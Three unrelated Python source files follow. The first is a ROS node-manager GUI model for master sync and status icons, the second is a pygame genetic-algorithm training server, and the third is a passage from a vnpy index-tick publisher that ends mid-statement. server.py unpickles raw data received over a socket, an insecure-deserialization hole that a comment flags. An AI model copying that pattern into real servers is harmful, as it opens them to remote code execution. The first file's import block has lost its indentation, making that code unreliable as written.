# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Fraunhofer nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import sys
from python_qt_binding.QtCore import QObject, QRect, Qt, Signal
from python_qt_binding.QtGui import QIcon, QImage, QStandardItem, QStandardItemModel
try:
from python_qt_binding.QtGui import QItemDelegate, QPushButton, QStyle
except Exception:
from python_qt_binding.QtWidgets import QItemDelegate, QPushButton, QStyle
from socket import getaddrinfo, AF_INET6
import threading
from fkie_master_discovery.common import get_hostname
from fkie_node_manager_daemon.common import isstring
import fkie_node_manager as nm
class MasterSyncButtonHelper(QObject):
    '''
    This is helper class which contains a button and can emit signals. The
    MasterSyncItem can not emit signals, but is used in QStandardModel.
    '''

    clicked = Signal(bool, str)

    # Sync states shown on the button.
    NOT_SYNC = 0
    SWITCHED = 1
    SYNC = 2

    ICON_PREFIX = 'irondevil'
    # ICON_PREFIX = 'crystal_clear'

    def __init__(self, master):
        QObject.__init__(self)
        self.name = master.name
        self._master = master
        self._syncronized = MasterSyncButtonHelper.NOT_SYNC
        self.ICONS = {MasterSyncButtonHelper.SYNC: nm.settings().icon("%s_sync.png" % self.ICON_PREFIX),
                      MasterSyncButtonHelper.NOT_SYNC: nm.settings().icon("%s_not_sync.png" % self.ICON_PREFIX),
                      MasterSyncButtonHelper.SWITCHED: nm.settings().icon("%s_start_sync.png" % self.ICON_PREFIX)}
        self.widget = QPushButton()
        # self.widget.setFlat(True)
        self.widget.setIcon(self.ICONS[MasterSyncButtonHelper.NOT_SYNC])
        self.widget.setMaximumSize(48, 48)
        self.widget.setCheckable(True)
        self.widget.clicked.connect(self.on_sync_clicked)

    def on_sync_clicked(self, checked):
        # Show the transitional icon until the sync result arrives.
        self.set_sync_state(MasterSyncButtonHelper.SWITCHED)
        self.clicked.emit(checked, self._master.uri)

    def master(self):
        return self._master

    def get_sync_state(self):
        return self._syncronized

    def set_sync_state(self, value):
        # Update icon and checked state only on actual state changes.
        if self._syncronized != value:
            self._syncronized = value
            if value in self.ICONS:
                self.widget.setIcon(self.ICONS[value])
                self.widget.setChecked(value == MasterSyncButtonHelper.SYNC)

    @staticmethod
    def _item_master_name(item):
        # `master` is a plain method on this class but a property on
        # MasterSyncItem; tolerate both when comparing items.
        master = item.master() if callable(item.master) else item.master
        return master.name.lower()

    def __eq__(self, item):
        # Fix: the previous code read `self.master.name`, but `master` is a
        # method here (not a property), so every comparison raised
        # AttributeError. Compare by the stored master's name instead.
        if isstring(item):
            return self._master.name.lower() == item.lower()
        elif item is not None:
            return self._master.name.lower() == self._item_master_name(item)
        return False

    def __gt__(self, item):
        if isstring(item):
            return self._master.name.lower() > item.lower()
        elif item is not None:
            return self._master.name.lower() > self._item_master_name(item)
        return False
class MasterSyncItem(QStandardItem):
    '''
    This object is needed to insert into the QStandardModel.
    '''
    ITEM_TYPE = QStandardItem.UserType + 35

    def __init__(self, master):
        QStandardItem.__init__(self)
        self.name = master.name
        # The clickable sync button lives in a helper QObject because a
        # QStandardItem cannot emit signals itself.
        self.button = MasterSyncButtonHelper(master)
        self.parent_item = None

    @property
    def master(self):
        return self.button.master()

    @property
    def synchronized(self):
        # One of MasterSyncButtonHelper.{NOT_SYNC, SWITCHED, SYNC}.
        return self.button.get_sync_state()

    @synchronized.setter
    def synchronized(self, value):
        self.button.set_sync_state(value)

    def __eq__(self, item):
        # Comparison is delegated to the button helper (master-name based).
        return self.button == item

    def __gt__(self, item):
        return self.button > item
class MasterItem(QStandardItem):
    '''
    The master item stored in the master model. This class stores the master as
    fkie_master_discovery.ROSMaster.
    '''

    ITEM_TYPE = QStandardItem.UserType + 34

    def __init__(self, master, local=False, quality=None, parent=None):
        # `quality` is the link quality in percent (or None/-1 if unknown).
        self.name = ''.join([master.name, ' (localhost)']) if local else master.name
        QStandardItem.__init__(self, '')  # self.name)
        self.parent_item = None
        self._master = master
        self.local = local
        self.__quality = quality
        self.descr = ''
        self.ICONS = {'green': nm.settings().icon('stock_connect_green.png'),
                      'yellow': nm.settings().icon('stock_connect_yellow.png'),
                      'red': nm.settings().icon('stock_connect_red.png'),
                      'grey': nm.settings().icon('stock_connect.png'),
                      'disconnected': nm.settings().icon('stock_disconnect.png'),
                      'warning': nm.settings().icon('crystal_clear_warning.png'),
                      'clock_warn': nm.settings().icon('crystal_clear_xclock_fail.png')}
        self.master_ip = None
        self._master_errors = []
        self._diagnostics = []
        self._timediff = 0
        self._threaded_get_ip()
        self.updateNameView(master, quality, self)

    def _threaded_get_ip(self):
        # Resolve the master host asynchronously so the GUI thread never
        # blocks on DNS lookups.
        thread = threading.Thread(target=self.__get_ip)
        thread.daemon = True
        thread.start()

    def __get_ip(self):
        try:
            # get the IP of the master uri
            result = getaddrinfo(get_hostname(self.master.uri), None)
            ips = []
            for r in result:
                if r[0] == AF_INET6:
                    (_family, _socktype, _proto, _canonname, (ip, _port, _flow, _scope)) = r
                else:
                    (_family, _socktype, _proto, _canonname, (ip, _port)) = r
                if self.master_ip is None and ip:
                    self.master_ip = ''
                if ip and ip not in ips:
                    # master_ip collects all distinct addresses, space separated.
                    self.master_ip = ' '.join([self.master_ip, ip])
                    ips.append(ip)
        except Exception:
            import traceback
            print(traceback.format_exc(1))

    @property
    def master(self):
        return self._master

    @master.setter
    def master(self, value):
        self._master = value

    @property
    def quality(self):
        return self.__quality

    @quality.setter
    def quality(self, value):
        # Refresh the row whenever the link quality changes.
        if self.__quality != value:
            self.__quality = value
            self.updateMasterView(self.parent_item)

    @property
    def diagnostics(self):
        return list(self._diagnostics)

    @property
    def master_errors(self):
        return list(self._master_errors)

    def updateMasterErrors(self, error_list):
        self._master_errors = error_list
        self.updateNameView(self.master, self.quality, self)

    def add_master_error(self, msg):
        if msg not in self._master_errors:
            self._master_errors.append(msg)
            self.updateNameView(self.master, self.quality, self)

    def update_master_diagnostics(self, diagnostics):
        # Keep only warnings/errors addressed to this master's hardware_id.
        del self._diagnostics[:]
        for diagnostic in diagnostics.status:
            if diagnostic.level > 0 and diagnostic.hardware_id == self._master.name:
                self._diagnostics.append(diagnostic)
        self.updateNameView(self.master, self.quality, self)

    def updateTimeDiff(self, timediff):
        self._timediff = timediff
        self.updateNameView(self.master, self.quality, self)

    def updateMasterView(self, parent):
        '''
        This method is called after the master state is changed to update the
        representation of the master. The name will not be changed, but all other
        data.
        @param parent: Item which contains this master item. This is needed to update
        other columns of this master.
        @type parent: U{QtGui.QStandardItem<https://srinikom.github.io/pyside-docs/PySide/QtGui/QStandardItem.html>}
        '''
        if parent is not None:
            # update the name decoration
            child = parent.child(self.row(), MasterModel.COL_NAME)
            if child is not None:
                self.updateNameView(self.master, self.quality, child)

    def updateNameView(self, master, quality, item):
        '''
        Updates the representation of the column contains the name state.
        @param master: the topic data
        @type master: fkie_master_discovery.TopicInfo
        @param item: corresponding item in the model
        @type item: L{TopicItem}
        '''
        # Build the rich-text tooltip, then pick the status icon.
        tooltip = ''.join(['<html><body>'])
        tooltip = ''.join([tooltip, '<h4>', master.uri, '</h4>'])
        tooltip = ''.join([tooltip, '<dl>'])
        tooltip = ''.join([tooltip, '<dt>', 'IP: ', str(self.master_ip), '</dt>'])
        if master.online:
            if quality is not None and quality != -1.:
                tooltip = ''.join([tooltip, '<dt>', 'Quality: ', str(quality), ' %', '</dt>'])
            else:
                tooltip = ''.join([tooltip, '<dt>', 'Quality: not available</dt>'])
        else:
            tooltip = ''.join([tooltip, '<dt>', 'offline', '</dt>'])
        tooltip = ''.join([tooltip, '</dl>'])
        if item.descr:
            tooltip = ''.join([tooltip, item.descr])
        # update the icon
        if master.online:
            timediff = abs(self._timediff) > nm.settings().max_timediff
            if self._master_errors or self._diagnostics or self.master_ip is None or timediff:
                item.setIcon(self.ICONS['warning'])
                if timediff:
                    tooltip = ''.join([tooltip, '<h4>', '<font color="#CC0000">Time difference to the host is about %.3f seconds!</font>' % self._timediff, '</h4>'])
                    item.setIcon(self.ICONS['clock_warn'])
                if self.master_ip is None:
                    tooltip = ''.join([tooltip, '<h4>', '<font color="#CC0000">Host not reachable by name!!! The ROS topics may not by connected!!!</font>', '</h4>'])
                if self._master_errors:
                    tooltip = ''.join([tooltip, '<h4>Errors reported by master_discovery:</h4>'])
                    for err in self._master_errors:
                        tooltip = ''.join([tooltip, '<dt><font color="#CC0000">%s</font></dt>' % err])
                for diag in self._diagnostics:
                    tooltip = ''.join([tooltip, '<dt><font color="#CC0000">%s</font></dt>' % diag.message])
            elif quality is not None and quality != -1.:
                if quality > 30:
                    item.setIcon(self.ICONS['green'])
                elif quality > 5:
                    item.setIcon(self.ICONS['yellow'])
                else:
                    item.setIcon(self.ICONS['red'])
            else:
                item.setIcon(self.ICONS['grey'])
        else:
            item.setIcon(self.ICONS['disconnected'])
        tooltip = ''.join([tooltip, '</body></html>'])
        item.setToolTip(tooltip)

    def update_description(self, descr):
        self.descr = descr
        self.updateNameView(self.master, self.quality, self)

    @classmethod
    def toHTML(cls, text):
        '''
        @param text: the text
        @type text: C{str}
        @return: the HTML representation of the name of the text
        @rtype: C{str}
        '''
        ns, sep, name = text.rpartition('/')
        result = ''
        if sep:
            result = ''.join(['<html><body>', '<span style="color:gray;">', str(ns), sep, '</span><b>', name, '</b></body></html>'])
        else:
            result = name
        return result

    def type(self):
        return MasterItem.ITEM_TYPE

    def __eq__(self, item):
        if isstring(item):
            return self.master.name.lower() == item.lower()
        elif not (item is None):
            return self.master.name.lower() == item.master.name.lower()
        return False

    def __gt__(self, item):
        if isstring(item):
            local = False
            try:
                local = nm.is_local(item)
            except Exception:
                pass
            if self.local and not local:  # local hosts are at the top
                return False
            return self.master.name.lower() > item.lower()
        elif not (item is None):
            if self.local and not item.local:  # local hosts are at the top
                return False
            return self.master.name.lower() > item.master.name.lower()
        return False
class MasterModel(QStandardItemModel):
    '''
    The model to manage the list with masters in ROS network.
    '''
    sync_start = Signal(str)
    sync_stop = Signal(str)

    header = [('Sync', 28), ('Name', -1)]
    '''@ivar: the list with columns C{[(name, width), ...]}'''

    COL_SYNC = 0
    COL_NAME = 1
    COL_SYNCBTN = 2

    def __init__(self, local_masteruri=None):
        '''
        Creates a new list model.
        '''
        QStandardItemModel.__init__(self)
        self.setColumnCount(len(MasterModel.header))
        self._masteruri = local_masteruri
        self.parent_view = None
        self.pyqt_workaround = dict()  # workaround for using with PyQt: store the python object to keep the defined attributes in the MasterItem subclass

    def flags(self, index):
        '''
        @param index: parent of the list
        @type index: U{QtCore.QModelIndex<https://srinikom.github.io/pyside-docs/PySide/QtCore/QModelIndex.html>}
        @return: Flag or the requestet item
        @rtype: U{QtCore.Qt.ItemFlag<https://srinikom.github.io/pyside-docs/PySide/QtCore/Qt.html>}
        @see: U{http://www.pyside.org/docs/pyside-1.0.1/PySide/QtCore/Qt.html}
        '''
        if not index.isValid():
            return Qt.NoItemFlags
        return Qt.ItemIsSelectable | Qt.ItemIsEnabled

    def updateMaster(self, master):
        '''
        Updates the information of the ros master. If the ROS master not exists, it
        will be added.
        @param master: the ROS master to update
        @type master: U{fkie_master_discovery.msg.ROSMaster<http://docs.ros.org/api/fkie_multimaster_msgs/html/msg/ROSMaster.html>}
        '''
        # remove master, if his name was changed but not the ROS master URI
        root = self.invisibleRootItem()
        for i in reversed(range(root.rowCount())):
            masterItem = root.child(i)
            if masterItem.master.uri == master.uri and masterItem.master.name != master.name:
                root.removeRow(i)
                try:
                    del self.pyqt_workaround[masterItem.master.name]
                except Exception:
                    pass
                break
        # update or add the item; rows are kept sorted, so insert before the
        # first item that compares greater than the new master's name.
        root = self.invisibleRootItem()
        doAddItem = True
        is_local = nm.is_local(get_hostname(master.uri))
        for index in range(root.rowCount()):
            masterItem = root.child(index, self.COL_NAME)
            if (masterItem == master.name):
                # update item
                masterItem.master = master
                masterItem.updateMasterView(root)
                doAddItem = False
                break
            elif (masterItem > master.name):
                self.addRow(master, is_local, root, index)
                doAddItem = False
                break
        if doAddItem:
            self.addRow(master, is_local, root, -1)

    def addRow(self, master, local, root, index):
        '''
        Creates the list of the items from master. This list is used for the
        visualization of master data as a table row.
        @param master: the master data
        @type master: fkie_master_discovery.ROSMaster
        @param local: whether the master is local or not
        @type local: bool
        @param index: insertion position, or -1 to append
        @return: the list for the representation as a row
        @rtype: C{[L{MasterItem} or U{QtGui.QStandardItem<https://srinikom.github.io/pyside-docs/PySide/QtGui/QStandardItem.html>}, ...]}
        '''
        items = []
        sync_item = MasterSyncItem(master)
        items.append(sync_item)
        name_item = MasterItem(master, local)
        items.append(name_item)
        name_item.parent_item = root
        self.pyqt_workaround[master.name] = items  # workaround for using with PyQt: store the python object to keep the defined attributes in the MasterItem subclass
        # add the items to the data model
        if index > -1:
            root.insertRow(index, items)
        else:
            root.appendRow(items)
        # add the sync button and connect the signals
        if self.parent_view is not None:
            newindex = index if index > -1 else root.rowCount() - 1
            self.parent_view.setIndexWidget(self.index(newindex, self.COL_SYNC), sync_item.button.widget)
            sync_item.button.clicked.connect(self.on_sync_clicked)
        return items

    def updateMasterStat(self, master, quality):
        '''
        Updates the information of the ros master.
        @param master: the ROS master to update
        @type master: C{str}
        @param quality: the quality of the connection to master
        @type quality: C{float}
        '''
        root = self.invisibleRootItem()
        for i in reversed(range(root.rowCount())):
            masterItem = root.child(i, self.COL_NAME)
            if masterItem.master.name in master:
                masterItem.quality = quality
                break

    def setChecked(self, master, state):
        '''
        Set the master to checked state
        @param master: the ROS master to update
        @type master: C{str}
        @param state: new state
        @type state: C{bool}
        '''
        root = self.invisibleRootItem()
        for i in reversed(range(root.rowCount())):
            masterItem = root.child(i, self.COL_SYNC)
            if masterItem.master.name == master:
                masterItem.synchronized = MasterSyncButtonHelper.SYNC if state else MasterSyncButtonHelper.NOT_SYNC
                break

    def removeMaster(self, master):
        '''
        Remove the master with given name.
        @param master: the name of the ROS master to remove
        @type master: C{str}
        '''
        root = self.invisibleRootItem()
        for i in reversed(range(root.rowCount())):
            masterItem = root.child(i, self.COL_NAME)
            if masterItem.master.name == master:
                root.removeRow(i)
                try:
                    # Fix: the row cache lives in self.pyqt_workaround; the old
                    # code deleted from nonexistent pyqt_workaround_sync/_info
                    # dicts, so the except always fired and the entry leaked.
                    del self.pyqt_workaround[masterItem.master.name]
                except Exception:
                    pass
                break

    def updateMasterErrors(self, master, errors):
        '''
        Updates the errors reported by master_discovery.
        @param master: the ROS master to update
        @type master: C{str}
        @param errors: the list with errors
        @type errors: C{[str]}
        '''
        root = self.invisibleRootItem()
        for i in reversed(range(root.rowCount())):
            masterItem = root.child(i, self.COL_NAME)
            if masterItem.master.name == master:
                masterItem.updateMasterErrors(errors)
                break

    def add_master_error(self, master, msg):
        '''
        Add error to the error list.
        :param str master: the ROS master to update
        :param str msg: error message
        '''
        root = self.invisibleRootItem()
        for i in reversed(range(root.rowCount())):
            masterItem = root.child(i, self.COL_NAME)
            if masterItem.master.name == master:
                masterItem.add_master_error(msg)
                break

    def update_master_diagnostic(self, master_name, diagnostics):
        # Forward a DiagnosticArray to the matching master item.
        root = self.invisibleRootItem()
        for i in reversed(range(root.rowCount())):
            masterItem = root.child(i, self.COL_NAME)
            if masterItem.master.name == master_name:
                masterItem.update_master_diagnostics(diagnostics)
                break

    def updateTimeDiff(self, master, timediff):
        '''
        Updates the time difference reported by master_discovery.
        @param master: the ROS master to update
        @type master: C{str}
        @param timediff: the time difference to the host
        @type timediff: float
        '''
        root = self.invisibleRootItem()
        for i in reversed(range(root.rowCount())):
            masterItem = root.child(i, self.COL_NAME)
            if masterItem.master.name == master:
                masterItem.updateTimeDiff(timediff)
                break

    def update_description(self, master, descr):
        '''
        Updates the description of the master with given name.
        @param master: the ROS master to update
        @type master: C{str}
        @param descr: the description of the master coded as HTML
        @type descr: C{str}
        '''
        root = self.invisibleRootItem()
        for i in range(root.rowCount()):
            masterItem = root.child(i, self.COL_NAME)
            if masterItem and masterItem.master.name == master:
                masterItem.update_description(descr)

    def on_sync_clicked(self, checked, masteruri):
        # Relay the button click as a start/stop sync request for masteruri.
        if checked:
            self.sync_start.emit(masteruri)
        else:
            self.sync_stop.emit(masteruri)
class MasterIconsDelegate(QItemDelegate):
    """Paints the status/diagnostic icon strip and the name of a MasterItem row."""

    def __init__(self, parent=None, *args):
        QItemDelegate.__init__(self, parent, *args)
        self._idx_icon = 1   # running x-offset while painting one row
        self._hspacing = 2
        self._vspacing = 4
        self._icon_size = 0
        self._enabled = True
        self.IMAGES = {}

    @staticmethod
    def _escape(text):
        # Fix: the previous inline chain was reduced to no-op
        # replace('>', '>') / replace('<', '<') calls (HTML entities lost);
        # escape properly so messages cannot break the rich-text tooltip.
        return text.replace('&', '&amp;').replace('<', '&lt;').replace('>', '&gt;')

    def _scale_icons(self, icon_size):
        # (Re)scale all state images to the current row height.
        self._icon_size = icon_size
        params = (self._icon_size, self._icon_size, Qt.IgnoreAspectRatio, Qt.SmoothTransformation)
        self.IMAGES = {'green': nm.settings().image('stock_connect_green.png').scaled(*params),
                       'yellow': nm.settings().image('stock_connect_yellow.png').scaled(*params),
                       'red': nm.settings().image('stock_connect_red.png').scaled(*params),
                       'grey': nm.settings().image('stock_connect.png').scaled(*params),
                       'disconnected': nm.settings().image('stock_disconnect.png').scaled(*params),
                       'warning': nm.settings().image('crystal_clear_warning.png').scaled(*params),
                       'clock_warn': nm.settings().image('crystal_clear_xclock_fail.png').scaled(*params),
                       'cpu_warn': nm.settings().image('hight_load.png').scaled(*params),
                       'cpu_temp_warn': nm.settings().image('temperatur_warn.png').scaled(*params),
                       'hdd_warn': nm.settings().image('crystal_clear_hdd_warn.png').scaled(*params),
                       'net_warn': nm.settings().image('sekkyumu_net_warn.png').scaled(*params),
                       'mem_warn': nm.settings().image('mem_warn.png').scaled(*params)
                       }

    def set_enabled(self, value):
        self._enabled = value

    def paint(self, painter, option, index):
        # update the icon size and resize images if needed
        if option.rect.height() - self._vspacing * 2 != self._icon_size:
            self._icon_size = option.rect.height() - self._vspacing * 2
            self._scale_icons(self._icon_size)
        painter.save()
        self._idx_icon = 1
        item = index.model().itemFromIndex(index)
        if option.state & QStyle.State_Selected:
            painter.fillRect(option.rect, option.palette.highlight())
        if isinstance(item, MasterItem):
            # Rebuild the tooltip while painting the state icons left to right.
            tooltip = '<html><body>'
            tooltip = '%s\n<h4>%s</h4>' % (tooltip, item.master.uri)
            tooltip = '%s\n<dt>IP: %s</dt>' % (tooltip, str(item.master_ip))
            if item.master.online:
                if item.quality is not None and item.quality != -1.:
                    tooltip = '%s\n<dt>Quality: %.2f </dt>' % (tooltip, item.quality)
                else:
                    tooltip = '%s\n<dt>Quality: not available</dt>' % (tooltip)
            else:
                tooltip = '%s\n<dt>offline</dt>' % (tooltip)
            # update warnings
            if item.master.online:
                master_errors = item.master_errors
                if master_errors or item.master_ip is None:
                    rect = self.calcDecorationRect(option.rect)
                    painter.drawImage(rect, self.IMAGES['warning'])
                    if item.master_ip is None:
                        tooltip = '%s\n<h4><font color="#CC0000">Host not reachable by name! The ROS topics may not by connected!</font></h4>' % (tooltip)
                    if master_errors:
                        tooltip = '%s\n<h4>Errors reported by master_discovery:</h4>' % (tooltip)
                        for err in master_errors:
                            tooltip = '%s\n<dt><font color="#CC0000">%s</font></dt>' % (tooltip, err)
                elif self._enabled:
                    rect = self.calcDecorationRect(option.rect)
                    if item.quality is not None and item.quality != -1.:
                        if item.quality > 30:
                            painter.drawImage(rect, self.IMAGES['green'])
                        elif item.quality > 5:
                            painter.drawImage(rect, self.IMAGES['yellow'])
                        else:
                            painter.drawImage(rect, self.IMAGES['red'])
                    else:
                        painter.drawImage(rect, self.IMAGES['grey'])
                    # check for time difference
                    timediff = abs(item._timediff) > nm.settings().max_timediff
                    if timediff:
                        tooltip = '%s\n<h4><font color="#CC0000">Time difference to the host is about %.3f seconds!</font></h4>' % (tooltip, item._timediff)
                        rect = self.calcDecorationRect(option.rect)
                        painter.drawImage(rect, self.IMAGES['clock_warn'])
            else:
                rect = self.calcDecorationRect(option.rect)
                painter.drawImage(rect, self.IMAGES['disconnected'])
            # update diagnostic warnings
            for diag in item.diagnostics:
                if diag.level > 0:
                    tooltip = '%s\n<dt><font color="#CC0000">%s</font></dt>' % (tooltip, self._escape(diag.message))
                    if 'Network Load' in diag.name:
                        rect = self.calcDecorationRect(option.rect)
                        painter.drawImage(rect, self.IMAGES['net_warn'])
                    if 'CPU Load' in diag.name:
                        rect = self.calcDecorationRect(option.rect)
                        painter.drawImage(rect, self.IMAGES['cpu_warn'])
                    if 'CPU Temperature' in diag.name:
                        rect = self.calcDecorationRect(option.rect)
                        painter.drawImage(rect, self.IMAGES['cpu_temp_warn'])
                    if 'Memory Usage' in diag.name:
                        rect = self.calcDecorationRect(option.rect)
                        painter.drawImage(rect, self.IMAGES['mem_warn'])
                    if 'HDD Usage' in diag.name:
                        rect = self.calcDecorationRect(option.rect)
                        painter.drawImage(rect, self.IMAGES['hdd_warn'])
            # update description from robot description parameter
            if item.descr:
                tooltip = '%s\n%s' % (tooltip, item.descr)
            # paint the name of the host
            tooltip = '%s\n</body></html>' % (tooltip)
            item.setToolTip(tooltip)
            rect = self.calcDecorationRect(option.rect, image=False)
            painter.drawText(rect, Qt.AlignVCenter, item.name)
        painter.restore()

    def calcDecorationRect(self, main_rect, image=True):
        # Returns the next icon slot (or the remaining text area) and advances
        # the running x-offset by one icon width.
        rect = QRect()
        rect.setX(main_rect.x() + self._idx_icon + self._hspacing)
        rect.setY(main_rect.y() + self._vspacing)
        rect.setWidth(self._icon_size if image else main_rect.width() - self._idx_icon)
        rect.setHeight(self._icon_size)
        self._idx_icon += self._icon_size + self._hspacing
        return rect
|
server.py | import socket
import asyncio
import os
import sys
import threading
import time
import nn
import ga
import pickle
from const import *
from pygame.locals import *
import pygame
import subprocess
from player import *
import game
from multiprocessing.pool import ThreadPool
import time
def listenCommunication(clientSocket):
    """Receive one pickled Player object from a client socket and append it
    to the global `players` list; the socket is always closed afterwards."""
    global players
    try:
        playerReceived = clientSocket.recv(2048)
        if playerReceived:
            try:
                # SECURITY: pickle.loads executes arbitrary code from the
                # peer; only run this server on a trusted network.
                p = pickle.loads(playerReceived)
                players.append(p)
            except Exception:
                # best-effort: ignore malformed or truncated payloads
                pass
    except Exception as inst:
        print("exp : " + str(inst))
    finally:
        # Fix: the old code leaked the socket whenever recv() raised.
        clientSocket.close()
def launchGame(name, score):
    # NOTE(review): dead code -- this function is shadowed by the one-argument
    # launchGame defined later in this module, which train() actually calls.
    # NOTE(review): passing a single command string to subprocess.call without
    # shell=True only works on Windows; the '\\' path separator also suggests
    # Windows -- confirm the intended platform.
    subprocess.call('python3 game.py mode=training filename=score\\' + str(name) + '.json speed=20 score=' + (str(score) if score > 2000 else '2000'))
def main(args):
    """Entry point: open the pygame status window, keep one training thread
    running and redraw the best player's stats every frame."""
    global connections, s, players, bestPlayer, robotoFont, SCREEN, tAccept, gen, pendingThread
    pygame.init()
    FPSCLOCK = pygame.time.Clock()
    SCREEN = pygame.display.set_mode((SCREENWIDTH, SCREENHEIGHT))
    pygame.display.set_caption('Server')
    robotoFont = pygame.font.SysFont("Arial", 14)
    gen = 0
    connections = []
    players = []
    bestPlayer = None
    pendingThread = 0
    print('launch')
    tTrain = threading.Thread(target=train)
    tTrain.start()
    while True:
        handleGameEvents()
        # Restart training as soon as the previous generation has finished.
        # Fix: Thread.isAlive() was deprecated in Python 3.8 and removed in
        # 3.9; the supported spelling is is_alive().
        if not tTrain.is_alive():
            tTrain = threading.Thread(target=train)
            tTrain.start()
        # Background
        SCREEN.fill((0, 0, 0))
        if bestPlayer is not None:
            showScore("BEST Input-Hidden", (10, 0))
            showScore(bestPlayer.brain.weight_ih, (10, 25))
            showScore("BEST Hidden-Output", (10, 50))
            showScore(bestPlayer.brain.weight_ho, (10, 75))
            showScore("Score", (10, 100))
            showScore(bestPlayer.score, (10, 125))
        # Always-visible counters: pending worker threads and generation.
        showScore(pendingThread, (10, SCREENHEIGHT - 50))
        showScore(gen, (10, SCREENHEIGHT - 25))
        pygame.display.update()
        FPSCLOCK.tick(FPS)
def showScore(score, pos):
    # Render `score` (any printable value) in white at `pos` on the global
    # SCREEN using the global font.
    label = robotoFont.render(str(score), 1, (255, 255, 255))
    SCREEN.blit(label, pos)
def handleGameEvents():
    # Drain the pygame event queue; exit the process on window close or ESC.
    for event in pygame.event.get():
        # QUIT
        if event.type == QUIT or (event.type == KEYDOWN and event.key == K_ESCAPE):
            pygame.quit()
            sys.exit()
def save(brain, name):
    """Serialize `brain` (anything with a tojson() method) to the file `name`."""
    with open(name, 'w') as out:
        out.write(brain.tojson())
def train():
    """Run one GA generation: dump each player's brain to disk, replay them
    through the game in a thread pool, track the best player and breed the
    next generation."""
    global players, bestPlayer, gen, pendingThread
    threads = []  # NOTE(review): unused -- confirm before removing
    print('Train')
    # Persist the current brains so game runs can load them by index.
    for i in range(0, len(players)):
        save(players[i].brain, "score\\" + str(i) + ".json")
    players.clear()
    # `launchGame` here resolves to the one-argument version defined below
    # (it shadows the two-argument version defined earlier in this module).
    # NOTE(review): nothing in launchGame appends to `players`; repopulation
    # appears to rely on listenCommunication's socket path -- confirm.
    p = ThreadPool(MAX_POPULATION)
    p.map(launchGame, range(MAX_POPULATION))
    maxScore = bestPlayer.score if bestPlayer != None else 0
    for player in players:
        if player.score > maxScore:
            maxScore = player.score
            bestPlayer = player
    if bestPlayer != None:
        save(bestPlayer.brain, "best.json")
    if len(players) > 0:
        gen += 1
        players = ga.nextGeneration(players)
def launchGame(i):
    """Replay game `i` in-process with the brain saved as score\\<i>.json.

    This definition shadows the earlier two-argument launchGame and is the
    callable used by the ThreadPool in train().
    """
    name = i
    # Target score to beat: the best score so far, with a floor of 2000.
    score = bestPlayer.score if bestPlayer != None else 0
    p = game.main([
        'mode=training',
        'filename=score\\' + str(name) + '.json',
        'speed=20',
        'score=' + (str(score) if score > 2000 else '2000')
    ])
    print(str(name) + ' : ' + str(p.score))
if __name__ == '__main__':
    # Start the server UI and training loop when run as a script.
    main(sys.argv)
|
engine.py | # encoding: UTF-8
# 通达信指数行情发布器
# 华富资产
import copy
import json
import traceback
from threading import Thread
from datetime import datetime, timedelta
from time import sleep
from logging import ERROR
from pytdx.exhq import TdxExHq_API
from copy import deepcopy
from vnpy.event import EventEngine
from vnpy.trader.constant import Exchange
from vnpy.trader.engine import BaseEngine, MainEngine
from vnpy.trader.event import EVENT_TIMER
from vnpy.trader.object import TickData, SubscribeRequest
from vnpy.trader.utility import get_trading_date, get_underlying_symbol, load_json, get_real_symbol_by_exchange
from vnpy.data.tdx.tdx_common import TDX_FUTURE_HOSTS, get_future_contracts
from vnpy.component.base import (
NIGHT_MARKET_23,
NIGHT_MARKET_SQ2,
MARKET_DAY_ONLY)
from vnpy.amqp.producer import publisher
from vnpy.gateway.ctp.ctp_gateway import CtpMdApi, symbol_exchange_map
APP_NAME = 'Idx_Publisher'
class IndexTickPublisherV2(BaseEngine):
    """
    Index tick publishing service (CTP edition).

    Receives ticks for all configured contracts through the CTP market-data
    API, synthesizes an open-interest-weighted index tick per underlying
    symbol, and publishes it to RabbitMQ.
    """

    # ----------------------------------------------------------------------
    def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
        """"""
        super(IndexTickPublisherV2, self).__init__(
            main_engine, event_engine, APP_NAME)

        self.main_engine = main_engine
        self.event_engine = event_engine
        self.create_logger(logger_name=APP_NAME)
        self.gateway_name = 'CTP'
        self.last_minute = None
        self.registerEvent()

        self.connection_status = False  # connection status

        # ctp md api
        self.subscribed_symbols = set()  # subscribed contract codes (vt_symbol)
        self.md_api = None               # md API session object
        self.last_tick_dt = {}           # underlying symbol -> datetime of its last published index tick
        self.instrument_count = 50000
        self.has_qry_instrument = False

        # rabbitmq settings taken from vt_setting.json
        self.conf = {}
        self.pub = None
        self.status = {}

        self.ticks = {}  # underlying symbol -> {real symbol: latest TickData}
        self.dt = datetime.now()

        # local /vnpy/data/tdx/future_contracts.json
        self.all_contracts = get_future_contracts()
        # underlying (short) symbols to subscribe; empty list means "all"
        self.selected_underly_symbols = load_json('subscribe_symbols.json', auto_save=False)
        # underlying symbol <=> number of real contracts
        self.underly_symbols_num_dict = {}

    def write_error(self, content: str):
        """Log *content* at ERROR level."""
        self.write_log(msg=content, level=ERROR)

    def create_publisher(self, conf):
        """Create the RabbitMQ message publisher (idempotent)."""
        if self.pub:
            return
        try:
            self.write_log(f'创建发布器:{conf}')
            # message publisher
            self.pub = publisher(host=conf.get('host', 'localhost'),
                                 port=conf.get('port', 5672),
